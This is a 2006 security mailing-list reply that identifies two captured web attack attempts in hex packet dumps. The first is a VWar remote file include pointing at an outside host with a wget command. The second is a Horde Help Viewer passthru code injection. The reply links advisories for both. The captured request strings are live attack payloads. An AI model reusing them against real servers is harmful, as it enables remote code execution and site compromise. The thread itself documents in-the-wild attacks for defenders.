Re: Someone scanning for new PHP issues?



On 4/16/06, Jamie Riden <jamesr@xxxxxxxxxx> wrote:
One of these might be the Horde exploit-
http://isc.sans.org/diary.php?storyid=1262 - any ideas on the other?

cheers,
Jamie

02:38:43.817967 IP compromised.com.1044 > www.example.com.www: P
0:412(412) ack 1 win 65535
0x0000: 4500 01c4 a2ac 4000 7106 5012 0ca2 a1a1 E.....@.q.P.....
0x0010: 48e8 1e4a 0414 0050 ec05 5522 9e0c 2a9d H..J...P..U"..*.
0x0020: 5018 ffff 3431 0000 4745 5420 6874 7470 P...41..GET.http
0x0030: 3a2f 2fxx xx2e yyyy yy2e 3330 2e37 342f ://xx.yyy.30.74/
0x0040: 7677 6172 2f69 6e63 6c75 6465 732f 6765 vwar/includes/ge
0x0050: 745f 6865 6164 6572 2e70 6870 3f76 7761 t_header.php?vwa
0x0060: 725f 726f 6f74 3d68 7474 703a 2f2f 7870 r_root=http://xp
0x0070: 6c2e 6e65 746d 6973 7068 6572 6532 2e63 l.netmisphere2.c
0x0080: 6f6d 2f43 4d44 2e67 6966 3f26 636d 643d om/CMD.gif?&cmd=
0x0090: 7767 6574 2048 5454 502f 312e 300d 0a48 wget.HTTP/1.0.

This is a VWar vulnerability in the get_header.php file (remote file
include vulnerability). More info at
http://www.securityfocus.com/bid/17358/info.

02:38:43.841958 IP compromised.com.1047 > www.example.com.www: P
1205950111:1205950537(426) ack 2648749032 win 65535
0x0000: 4500 01d2 a2b9 4000 7206 4ef7 0ca2 a1a1 E.....@.r.N.....
0x0010: 48e8 1e4a 0417 0050 47e1 569f 9de0 b3e8 H..J...PG.V.....
0x0020: 5018 ffff 1fd8 0000 4745 5420 6874 7470 P.......GET.http
0x0030: 3a2f 2fxx xx2e yyyy yy2e 3330 2e37 342f ://xx.yyy.30.74/
0x0040: 7765 626d 6169 6c2f 686f 7264 652f 7365 webmail/horde/se
0x0050: 7276 6963 6573 2f68 656c 702f 3f73 686f rvices/help/?sho
0x0060: 773d 6162 6f75 7426 6d6f 6475 6c65 3d3b w=about&module=;
0x0070: 2532 322e 7061 7373 7468 7275 2825 3232 %22.passthru(%22
0x0080: 6563 686f 2532 3049 524f 434b 5448 4557 echo%20IROCKTHEW
0x0090: 4f52 4c44 2532 3229 3b27 2e20 4854 5450 ORLD%22);'..HTTP
0x00a0: 2f31 2e30 0d0a 486f 7374 3a20 3732 2e32 /1.0..Host:.72.2
0x00b0: 3332 2e33 302e 3734 0d0a 5265 6665 7265 32.30.74..

This is, as you wrote above, the Horde Help Viewer remote php code
execution vulnerability. More info at
http://www.securityfocus.com/bid/17292.

Unfortunately exploits are in the wild, and the Horde one is
especially bad (knowing that Horde is used a lot).

Cheers,

Bojan



Relevant Pages